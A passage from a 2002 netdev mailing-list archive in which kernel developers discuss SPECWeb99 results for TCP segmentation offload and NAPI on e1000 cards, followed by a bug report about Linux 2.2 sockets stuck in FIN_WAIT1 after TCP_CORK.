with ESMTP id VAA20181; Thu, 5 Sep 2002 21:54:27 -0400 (EDT) Received: from localhost (hadi@localhost) by shell.cyberus.ca (8.11.6+Sun/8.11.6) with ESMTP id g861lZA21781; Thu, 5 Sep 2002 21:47:35 -0400 (EDT) X-Authentication-Warning: shell.cyberus.ca: hadi owned process doing -bs Date: Thu, 5 Sep 2002 21:47:35 -0400 (EDT) From: jamal To: Nivedita Singhvi cc: Troy Wilson , , Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 In-Reply-To: <1031266115.3d77df4344463@imap.linux.ibm.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 80 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: hadi@cyberus.ca Precedence: bulk X-list: netdev On Thu, 5 Sep 2002, Nivedita Singhvi wrote: > > > value in your results is in saving on retransmits; I would think > > shoving the data down the NIC and avoid the fragmentation shouldnt > > give you that much significant CPU savings. Do you have any stats > > Why do say that? Wouldnt the fact that youre now reducing the > number of calls down the stack by a significant number provide > a significant saving? I am not sure; if he gets a busy system in a congested network, i can see the offloading savings i.e i am not sure if the amortization of the calls away from the CPU is sufficient enough savings if it doesnt involve a lot of retransmits. I am also wondering how smart this NIC in doing the retransmits; example i have doubts if this idea is briliant to begin with; does it handle SACKs for example? What about the du-jour algorithm, would you have to upgrade the NIC or can it be taught some new trickes etc etc. [also i can see why it makes sense to use this feature only with sendfile; its pretty much useless for interactive apps] Troy, i am not interested in the nestat -s data rather the TCP stats this NIC has exposed. Unless those somehow show up magically in netstat. 
cheers, jamal From niv@us.ibm.com Thu Sep 5 20:34:10 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 05 Sep 2002 20:34:12 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g863Y9tG008434 for ; Thu, 5 Sep 2002 20:34:10 -0700 Received: from northrelay03.pok.ibm.com (northrelay03.pok.ibm.com [9.56.224.151]) by e1.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g863cDEG075470; Thu, 5 Sep 2002 23:38:13 -0400 Received: from smtp.linux.ibm.com (ltc-eth1000.torolab.ibm.com [9.26.4.197]) by northrelay03.pok.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g863cB4V086584; Thu, 5 Sep 2002 23:38:12 -0400 Received: from imap.linux.ibm.com (imap.linux.ibm.com [9.27.103.44]) by smtp.linux.ibm.com (Postfix) with ESMTP id 8F14D3FE06; Thu, 5 Sep 2002 23:38:11 -0400 (EDT) Received: by imap.linux.ibm.com (Postfix, from userid 99) id D4B9E23C00D; Thu, 5 Sep 2002 23:38:10 -0400 (EDT) Received: from 9.65.33.25 ( [9.65.33.25]) as user niv@imap.linux.ibm.com by imap.linux.ibm.com with HTTP; Thu, 5 Sep 2002 20:38:10 -0700 Message-ID: <1031283490.3d7823228d9ed@imap.linux.ibm.com> Date: Thu, 5 Sep 2002 20:38:10 -0700 From: Nivedita Singhvi To: jamal Cc: Troy Wilson , linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 9.65.33.25 X-archive-position: 81 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev Quoting jamal : > I am not sure; if he gets a busy system in a congested network, i > can see the offloading savings i.e i am not sure if the amortization > of the calls away from the CPU is sufficient enough savings if it > doesnt involve a lot of retransmits. 
I am also wondering how smart > this NIC in doing the retransmits; example i have doubts if this > idea is briliant to begin with; does it handle SACKs for example? do you mean sack data being sent as a tcp option? dont know, lots of other questions arise (like timestamp on all the segments would be the same?). > Troy, i am not interested in the nestat -s data rather the TCP > stats this NIC has exposed. Unless those somehow show up magically > in netstat. most recent (dont know how far back) versions of netstat display /proc/net/snmp and /proc/net/netstat (with the Linux TCP MIB), so netstat -s should show you most of whats interesting. Or were you referring to something else? ifconfig -a and netstat -rn would also be nice to have.. thanks, Nivedita From davem@redhat.com Thu Sep 5 20:50:21 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 05 Sep 2002 20:50:24 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g863oKtG009137 for ; Thu, 5 Sep 2002 20:50:21 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id UAA08313; Thu, 5 Sep 2002 20:47:22 -0700 Date: Thu, 05 Sep 2002 20:47:21 -0700 (PDT) Message-Id: <20020905.204721.49430679.davem@redhat.com> To: hadi@cyberus.ca Cc: tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. 
Miller" In-Reply-To: References: <200209051830.g85IUMdH096254@tempest.prismnet.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 82 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: jamal Date: Thu, 5 Sep 2002 16:59:47 -0400 (EDT) I would think shoving the data down the NIC and avoid the fragmentation shouldnt give you that much significant CPU savings. It's the DMA bandwidth saved, most of the specweb runs on x86 hardware is limited by the DMA throughput of the PCI host controller. In particular some controllers are limited to smaller DMA bursts to work around hardware bugs. Ie. the headers that don't need to go across the bus are the critical resource saved by TSO. I think I've said this a million times, perhaps the next person who tries to figure out where the gains come from can just reply with a pointer to a URL of this email I'm typing right now :-) From davem@redhat.com Thu Sep 5 20:59:28 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 05 Sep 2002 20:59:33 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g863xRtG009910 for ; Thu, 5 Sep 2002 20:59:27 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id UAA08427; Thu, 5 Sep 2002 20:56:27 -0700 Date: Thu, 05 Sep 2002 20:56:26 -0700 (PDT) Message-Id: <20020905.205626.73509740.davem@redhat.com> To: hadi@cyberus.ca Cc: niv@us.ibm.com, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. 
Miller" In-Reply-To: References: <1031266115.3d77df4344463@imap.linux.ibm.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 83 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: jamal Date: Thu, 5 Sep 2002 21:47:35 -0400 (EDT) I am not sure; if he gets a busy system in a congested network, i can see the offloading savings i.e i am not sure if the amortization of the calls away from the CPU is sufficient enough savings if it doesnt involve a lot of retransmits. I am also wondering how smart this NIC in doing the retransmits; example i have doubts if this idea is briliant to begin with; does it handle SACKs for example? What about the du-jour algorithm, would you have to upgrade the NIC or can it be taught some new trickes etc etc. [also i can see why it makes sense to use this feature only with sendfile; its pretty much useless for interactive apps] Troy, i am not interested in the nestat -s data rather the TCP stats this NIC has exposed. Unless those somehow show up magically in netstat. There are no retransmits happening, the card does not analyze activity on the TCP connection to retransmit things itself it's just a simple header templating facility. Read my other emails about where the benefits come from. In fact when connection is sick (ie. retransmits and SACKs occur) we disable TSO completely for that socket. 
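A rough way to put numbers on the "header templating" point: without TSO every wire segment carries its own headers across the bus, while with TSO one template header goes down with the whole payload. The sketch below only does that arithmetic. The 66-byte header size (Ethernet 14 + IPv4 20 + TCP 20 + 12 bytes of timestamp option), the MSS, and the function names are assumptions made for illustration; none of them come from the e1000 driver or from this thread.

```c
#include <stddef.h>

/* Assumed per-segment header size, for illustration only:
 * Ethernet 14 + IPv4 20 + TCP 20 + 12 bytes of TCP timestamp option. */
#define ASSUMED_HDR_BYTES 66u

/* Number of wire segments needed to carry `payload` bytes at a given MSS.
 * Returns 0 for an empty payload or a zero MSS. */
size_t tso_segments(size_t payload, size_t mss)
{
    if (payload == 0 || mss == 0)
        return 0;
    return (payload + mss - 1) / mss;   /* ceiling division */
}

/* Header bytes that no longer cross the bus when one template header
 * replaces a header per segment: (segments - 1) * header size. */
size_t tso_header_bytes_saved(size_t payload, size_t mss, size_t hdr)
{
    size_t segs = tso_segments(payload, mss);

    return segs ? (segs - 1) * hdr : 0;
}
```

Under these assumptions, tso_header_bytes_saved(65536, 1448, ASSUMED_HDR_BYTES) works out to 45 headers, i.e. 2970 bytes, for a 46-segment send. It says nothing about descriptor counts or DMA burst behaviour, which the arithmetic does not model.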
From davem@redhat.com Thu Sep 5 21:01:46 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 05 Sep 2002 21:01:48 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8641ktG010367 for ; Thu, 5 Sep 2002 21:01:46 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id UAA08463; Thu, 5 Sep 2002 20:58:42 -0700 Date: Thu, 05 Sep 2002 20:58:42 -0700 (PDT) Message-Id: <20020905.205842.127265672.davem@redhat.com> To: niv@us.ibm.com Cc: hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: <1031283490.3d7823228d9ed@imap.linux.ibm.com> References: <1031283490.3d7823228d9ed@imap.linux.ibm.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 84 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Nivedita Singhvi Date: Thu, 5 Sep 2002 20:38:10 -0700 most recent (dont know how far back) versions of netstat display /proc/net/snmp and /proc/net/netstat (with the Linux TCP MIB), so netstat -s should show you most of whats interesting. Or were you referring to something else? ifconfig -a and netstat -rn would also be nice to have.. TSO gets turned off during retransmits/SACK and the card does not do retransmits. Can we move on in this conversation now? 
:-) From niv@us.ibm.com Thu Sep 5 21:16:46 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 05 Sep 2002 21:16:47 -0700 (PDT) Received: from e35.co.us.ibm.com (e35.co.us.ibm.com [32.97.110.133]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g864GktG011179 for ; Thu, 5 Sep 2002 21:16:46 -0700 Received: from westrelay05.boulder.ibm.com (westrelay05.boulder.ibm.com [9.17.193.33]) by e35.co.us.ibm.com (8.12.2/8.12.2) with ESMTP id g864KoBA008482; Fri, 6 Sep 2002 00:20:50 -0400 Received: from smtp.linux.ibm.com (ltc-eth1000.torolab.ibm.com [9.26.4.197]) by westrelay05.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g864KeZL060734; Thu, 5 Sep 2002 22:20:41 -0600 Received: from imap.linux.ibm.com (imap.linux.ibm.com [9.27.103.44]) by smtp.linux.ibm.com (Postfix) with ESMTP id 29F9D3FE06; Fri, 6 Sep 2002 00:20:48 -0400 (EDT) Received: by imap.linux.ibm.com (Postfix, from userid 99) id 6DCF023C00D; Fri, 6 Sep 2002 00:20:47 -0400 (EDT) Received: from 9.65.33.25 ( [9.65.33.25]) as user niv@imap.linux.ibm.com by imap.linux.ibm.com with HTTP; Thu, 5 Sep 2002 21:20:47 -0700 Message-ID: <1031286047.3d782d1f27162@imap.linux.ibm.com> Date: Thu, 5 Sep 2002 21:20:47 -0700 From: Nivedita Singhvi To: "David S. Miller" Cc: hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <1031283490.3d7823228d9ed@imap.linux.ibm.com> <20020905.205842.127265672.davem@redhat.com> In-Reply-To: <20020905.205842.127265672.davem@redhat.com> MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 9.65.33.25 X-archive-position: 85 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: niv@us.ibm.com Precedence: bulk X-list: netdev Quoting "David S. 
Miller" : > > ifconfig -a and netstat -rn would also be nice to have.. > > TSO gets turned off during retransmits/SACK and the card does not > do > retransmits. > > Can we move on in this conversation now? :-) Sure :). The motivation for seeing the stats though would be to get an idea of how much retransmission/SACK etc activity _is_ occurring during Troy's SpecWeb runs, which would give us an idea of how often we're actually doing segmentation offload, and better idea of how much gain its possible to further get from this(ahem) DMA coalescing :). Some of Troy's early runs had a very large number of packets dropped by the card. thanks, Nivedita From davem@redhat.com Thu Sep 5 21:20:03 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 05 Sep 2002 21:20:05 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g864K3tG011553 for ; Thu, 5 Sep 2002 21:20:03 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id VAA08601; Thu, 5 Sep 2002 21:17:04 -0700 Date: Thu, 05 Sep 2002 21:17:03 -0700 (PDT) Message-Id: <20020905.211703.38779558.davem@redhat.com> To: niv@us.ibm.com Cc: hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. 
Miller" In-Reply-To: <1031286047.3d782d1f27162@imap.linux.ibm.com> References: <1031283490.3d7823228d9ed@imap.linux.ibm.com> <20020905.205842.127265672.davem@redhat.com> <1031286047.3d782d1f27162@imap.linux.ibm.com> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 86 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Nivedita Singhvi Date: Thu, 5 Sep 2002 21:20:47 -0700 Sure :). The motivation for seeing the stats though would be to get an idea of how much retransmission/SACK etc activity _is_ occurring during Troy's SpecWeb runs, which would give us an idea of how often we're actually doing segmentation offload, and better idea of how much gain its possible to further get from this(ahem) DMA coalescing :). Some of Troy's early runs had a very large number of packets dropped by the card. One thing to do is make absolutely sure that flow control is enabled and supported by all devices on the link from the client to the test specweb server. Troy, can you do that for us along with the statistic dumps? Thanks. From Martin.Bligh@us.ibm.com Thu Sep 5 23:45:59 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 05 Sep 2002 23:46:01 -0700 (PDT) Received: from e1.ny.us.ibm.com (e1.ny.us.ibm.com [32.97.182.101]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g866jwtG015466 for ; Thu, 5 Sep 2002 23:45:59 -0700 Received: from westrelay01.boulder.ibm.com (westrelay01.boulder.ibm.com [9.17.194.22]) by e1.ny.us.ibm.com (8.12.2/8.12.2) with ESMTP id g866o2EG117966; Fri, 6 Sep 2002 02:50:02 -0400 Received: from [10.10.2.3] (sig-9-65-197-17.mts.ibm.com [9.65.197.17]) by westrelay01.boulder.ibm.com (8.12.3/NCO/VER6.4) with ESMTP id g866nvhA072964; Fri, 6 Sep 2002 00:49:58 -0600 Date: Thu, 05 Sep 2002 23:48:42 -0700 From: "Martin J.
Bligh" Reply-To: "Martin J. Bligh" To: "David S. Miller" , hadi@cyberus.ca cc: tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, Nivedita Singhvi Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 Message-ID: <18563262.1031269721@[10.10.2.3]> In-Reply-To: <20020905.204721.49430679.davem@redhat.com> References: <20020905.204721.49430679.davem@redhat.com> X-Mailer: Mulberry/2.1.2 (Win32) MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: inline X-archive-position: 87 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: Martin.Bligh@us.ibm.com Precedence: bulk X-list: netdev > I would think shoving the data down the NIC > and avoid the fragmentation shouldnt give you that much significant > CPU savings. > > It's the DMA bandwidth saved, most of the specweb runs on x86 hardware > is limited by the DMA throughput of the PCI host controller. In > particular some controllers are limited to smaller DMA bursts to > work around hardware bugs. > > Ie. the headers that don't need to go across the bus are the critical > resource saved by TSO. I'm not sure that's entirely true in this case - the Netfinity 8500R is slightly unusual in that it has 3 or 4 PCI buses, and there's 4 - 8 gigabit ethernet cards in this beast spread around different buses (Troy - are we still just using 4? ... and what's the raw bandwidth of data we're pushing? ... it's not huge). I think we're CPU limited (there's no idle time on this machine), which is odd for an 8 CPU 900MHz P3 Xeon, but still, this is Apache, not Tux. You mentioned CPU load as another advantage of TSO ... anything we've done to reduce CPU load enables us to run more and more connections (I think we started at about 260 or something, so 2900 ain't too bad ;-)). 
Just to throw another firework into the fire whilst people are awake, NAPI does not seem to scale to this sort of load, which was disappointing, as we were hoping it would solve some of our interrupt load problems ... seems that half the machine goes idle, the number of simultaneous connections drop way down, and everything's blocked on ... something ... not sure what ;-) Any guesses at why, or ways to debug this? M. PS. Anyone else running NAPI on SMP? (ideally at least 4-way?) From davem@redhat.com Thu Sep 5 23:55:01 2002 Received: with ECARTIS (v1.0.0; list netdev); Thu, 05 Sep 2002 23:55:04 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g866t1tG015954 for ; Thu, 5 Sep 2002 23:55:01 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id XAA10784; Thu, 5 Sep 2002 23:51:59 -0700 Date: Thu, 05 Sep 2002 23:51:59 -0700 (PDT) Message-Id: <20020905.235159.128049953.davem@redhat.com> To: Martin.Bligh@us.ibm.com Cc: hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: <18563262.1031269721@[10.10.2.3]> References: <20020905.204721.49430679.davem@redhat.com> <18563262.1031269721@[10.10.2.3]> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 88 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: "Martin J. 
Bligh" Date: Thu, 05 Sep 2002 23:48:42 -0700 Just to throw another firework into the fire whilst people are awake, NAPI does not seem to scale to this sort of load, which was disappointing, as we were hoping it would solve some of our interrupt load problems ... Stupid question, are you sure you have CONFIG_E1000_NAPI enabled? NAPI is also not the panacea to all problems in the world. I bet your greatest gain would be obtained from going to Tux and using appropriate IRQ affinity settings and making sure Tux threads bind to same cpu as device where they accept connections. It is standard method to obtain peak specweb performance. From mbp@samba.org Fri Sep 6 00:07:34 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 00:07:39 -0700 (PDT) Received: from sngrel5.hp.com (sngrel5.hp.com [192.6.86.210]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g8677VtG016456 for ; Fri, 6 Sep 2002 00:07:33 -0700 Received: from ctss200.sgp.hp.com (ctss200.sgp.hp.com [15.68.10.200]) by sngrel5.hp.com (Postfix) with ESMTP id 9BA5A6C3 for ; Fri, 6 Sep 2002 15:11:35 +0800 (SGP) Received: from XAUBRG2.AUS.HP.COM (xaubrg2.aus.hp.com [15.23.69.43]) by ctss200.sgp.hp.com (8.9.3 (PHNE_18979)/8.9.3 SMKit6.0.6 OpenMail) with SMTP id PAA04362 for ; Fri, 6 Sep 2002 15:11:34 +0800 (SGP) Received: from 15.23.69.43 by XAUBRG2.AUS.HP.COM (InterScan E-Mail VirusWall NT); Fri, 06 Sep 2002 17:11:30 +1000 Received: from XAUBRG2.AUS.HP.COM (localhost [127.0.0.1]) by XAUBRG2.AUS.HP.COM with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2656.59) id SJWWPBW1; Fri, 6 Sep 2002 17:11:30 +1000 Received: from 16.176.68.120 by XAUBRG2.AUS.HP.COM (InterScan E-Mail VirusWall NT); Fri, 06 Sep 2002 17:11:29 +1000 Received: from mbp by vexed.aus.hp.com with local (Exim 3.35 #1 (Debian)) id 17nDGm-0007N2-00; Fri, 06 Sep 2002 17:11:08 +1000 Date: Fri, 6 Sep 2002 17:11:08 +1000 From: Martin Pool To: alan@redhat.com, netdev@oss.sgi.com Subject: linux 2.2 TCP_CORK FIN_WAIT1 reproducible bug 
Message-ID: <20020906071108.GC26914@samba.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4i X-GPG: 1024D/A0B3E88B: AFAC578F 1841EE6B FD95E143 3C63CA3F A0B3E88B X-archive-position: 89 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mbp@samba.org Precedence: bulk X-list: netdev

I think I've found a bug in 2.2's TCP stack, in which sockets can get into FIN_WAIT1 with no timer and stay stuck indefinitely.

Steps to reproduce seem to be basically as follows:

From a client running 2.2.16, open a TCP socket to a server. Set TCP_CORK, write some data, exit.

The exit ought to implicitly close the socket, but instead the socket goes into FIN_WAIT1 and never closes properly. netstat on the client shows

  tcp 0 44 192.168.0.146:1146 192.168.0.209:4200 FIN_WAIT1 off (0.00/0/0)

As far as I can make out, this is a state that should never occur: if there is data still in the send queue, then there should always be a timer running to retransmit it and/or probe the remote machine for more window space. Also, I would think that in FIN_WAIT1 there ought to be a timer that will cause the FIN to be retransmitted in case it was lost.

On the server:

  ngoh@build04.foo.com $ netstat -ton | grep 4200
  tcp 0 0 192.168.0.209:4200 192.168.0.146:1146 ESTABLISHED off (0.00/0/0)

So it looks to me like the server just does not see a FIN from the client. The server application (distccd) is just blocked in read(), waiting for more data or EOF.

tcpdump seems to show that the client just never sends the FIN

  22:16:21.690340 build03.foo.com.1146 > build04.foo.com.4200: S 1541177197:1541177197(0) win 32120 (DF)
  22:16:21.690537 build04.foo.com.4200 > build03.foo.com.1146: S 1546103786:1546103786(0) ack 1541177198 win 32120 (DF)
  22:16:21.690593 build03.foo.com.1146 > build04.foo.com.4200: . ack 1 win 32120 (DF)
  22:16:21.691329 build03.foo.com.1146 > build04.foo.com.4200: P 1:1448(1447) ack 1 win 32120 (DF)
  22:16:21.691822 build04.foo.com.4200 > build03.foo.com.1146: . ack 1448 win 31856 (DF)

If the TCP_CORK is never inserted, or if the application removes the cork before exiting, then things work properly. Also, this works properly on 2.4.18. It seems that the problem is not to do with firewalling troubles or packet loss.

This was originally observed by Hien D. Ngo on 2.2.16 and 2.2.19 while trying out my program distcc on some Red Hat 6.2 machines. All of the gory details are available here:

  http://lists.samba.org/pipermail/distcc/2002q3/thread.html

I don't have any 2.2 machines myself, but if necessary I can install it and try to reproduce the problem.

So I would guess that there is some kind of bug in tcp_snd_test()'s logic for deciding whether to send a packet. The comment there claims to handle this case of close() with cork in place, but it seems that it does not. (I don't really know if it's that function, it could be elsewhere.) The final statement is

  return ((!tail || nagle_check || skb_tailroom(skb) < 32) &&
          ((tcp_packets_in_flight(tp) < tp->snd_cwnd) ||
           (TCP_SKB_CB(skb)->flags & TCPCB_FLAG_FIN)) &&
          !after(TCP_SKB_CB(skb)->end_seq, tp->snd_una + tp->snd_wnd) &&
          tp->retransmits == 0);

As far as I can see all of these are true, so either my assumptions are wrong, or this function is not itself the problem. We're OK on the first, because nagle_check will be 1. We're OK on the second because presumably TCPCB_FLAG_FIN is set. We're OK on the third because there's plenty of space in the window. And we should be OK on the fourth because the packet hasn't been retransmitted.

I wonder if the transmit queue actually has a small data packet ahead of the FIN packet, and the data packet is not being sent and therefore jamming up the works? If that was true, and they somehow did not get combined, then... flags for that packet would not have FIN, and the length would be less than the mss_cache, so nagle_check would become 0. It wouldn't be the tail; the nagle check would be false, and it wouldn't be nearly full. So tcp_snd_test() would return 0.

Anyhow, I hope you find it an interesting bug. Please cc me on replies and let me know if there's anything I can do to help.

(Incidentally, distcc is pretty cool if you ever compile large programs, like, say, the kernel. On my 3 PCs it builds 2.6 times faster, and it's pretty trivial to install. Try it, you'll like it.)

-- 
Martin

From akpm@zip.com.au Fri Sep 6 00:18:44 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 00:18:54 -0700 (PDT) Received: from vasquez.zip.com.au (vasquez.zip.com.au [203.12.97.41]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g867IgtG017280 for ; Fri, 6 Sep 2002 00:18:43 -0700 Received: from zip.com.au (root@zipperii.zip.com.au [61.8.0.87]) by vasquez.zip.com.au (8.9.3/8.9.3/Debian 8.9.3-21) with ESMTP id RAA28158; Fri, 6 Sep 2002 17:22:31 +1000 X-Authentication-Warning: vasquez.zip.com.au: Host root@zipperii.zip.com.au [61.8.0.87] claimed to be zip.com.au Message-ID: <3D785AE4.A7E3DF2D@zip.com.au> Date: Fri, 06 Sep 2002 00:36:04 -0700 From: Andrew Morton X-Mailer: Mozilla 4.79 [en] (X11; U; Linux 2.5.33 i686) X-Accept-Language: en MIME-Version: 1.0 To: "David S. Miller" CC: Martin.Bligh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 References: <18563262.1031269721@[10.10.2.3]> <20020905.235159.128049953.davem@redhat.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 90 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: akpm@zip.com.au Precedence: bulk X-list: netdev "David S. Miller" wrote: > > ...
> > NAPI is also not the panacea to all problems in the world. > Mala did some testing on this a couple of weeks back. It appears that NAPI damaged performance significantly. http://www-124.ibm.com/developerworks/opensource/linuxperf/netperf/results/july_02/netperf2.5.25results.htm From davem@redhat.com Fri Sep 6 00:25:57 2002 Received: with ECARTIS (v1.0.0; list netdev); Fri, 06 Sep 2002 00:25:59 -0700 (PDT) Received: from pizda.ninka.net (IDENT:root@pizda.ninka.net [216.101.162.242]) by oss.sgi.com (8.12.5/8.12.5) with SMTP id g867PvtG018012 for ; Fri, 6 Sep 2002 00:25:57 -0700 Received: from localhost (IDENT:davem@localhost.localdomain [127.0.0.1]) by pizda.ninka.net (8.9.3/8.9.3) with ESMTP id AAA11159; Fri, 6 Sep 2002 00:22:54 -0700 Date: Fri, 06 Sep 2002 00:22:53 -0700 (PDT) Message-Id: <20020906.002253.32989079.davem@redhat.com> To: akpm@zip.com.au Cc: Martin.Bligh@us.ibm.com, hadi@cyberus.ca, tcw@tempest.prismnet.com, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, niv@us.ibm.com, Robert.Olsson@data.slu.se Subject: Re: Early SPECWeb99 results on 2.5.33 with TSO on e1000 From: "David S. Miller" In-Reply-To: <3D785AE4.A7E3DF2D@zip.com.au> References: <18563262.1031269721@[10.10.2.3]> <20020905.235159.128049953.davem@redhat.com> <3D785AE4.A7E3DF2D@zip.com.au> X-Mailer: Mew version 2.1 on Emacs 21.1 / Mule 5.0 (SAKAKI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 91 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: davem@redhat.com Precedence: bulk X-list: netdev From: Andrew Morton Date: Fri, 06 Sep 2002 